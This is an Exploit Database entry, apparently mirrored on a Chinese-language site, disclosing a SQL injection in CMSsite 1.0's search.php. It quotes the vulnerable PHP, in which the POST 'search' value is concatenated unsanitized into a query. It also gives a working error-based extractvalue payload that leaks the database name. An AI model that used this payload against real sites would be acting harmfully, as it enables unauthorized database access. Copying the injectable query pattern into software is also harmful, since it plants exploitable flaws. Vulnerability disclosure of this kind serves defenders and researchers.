CMSsite 1.0 – ‘search’ SQL Injection

• Exploit Database
• 117 阅读

• 作者： Majid kalantari
  日期： 2019-01-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46260/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  # Exploit Title: CMSsite 1.0 - 'search' SQL injection # Exploit Author : Majid kalantari (mjd.hack@gmail.com) # Date: 2019-01-27 # Vendor Homepage : https://github.com/VictorAlagwu/CMSsite # Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 # CVE: N/A ===============================================   # vulnerable file: search.php # vulnerable parameter : POST - search   if (isset($_POST['submit'])) { $search = $_POST["search"]; } $query = "SELECT * FROM posts WHERE post_tags LIKE '%$search%' AND post_status='publish'"; $search_query = mysqli_query($con, $query);   # payload on search text box: ' and extractvalue(1,concat(':',database(),':'))#   ===============================================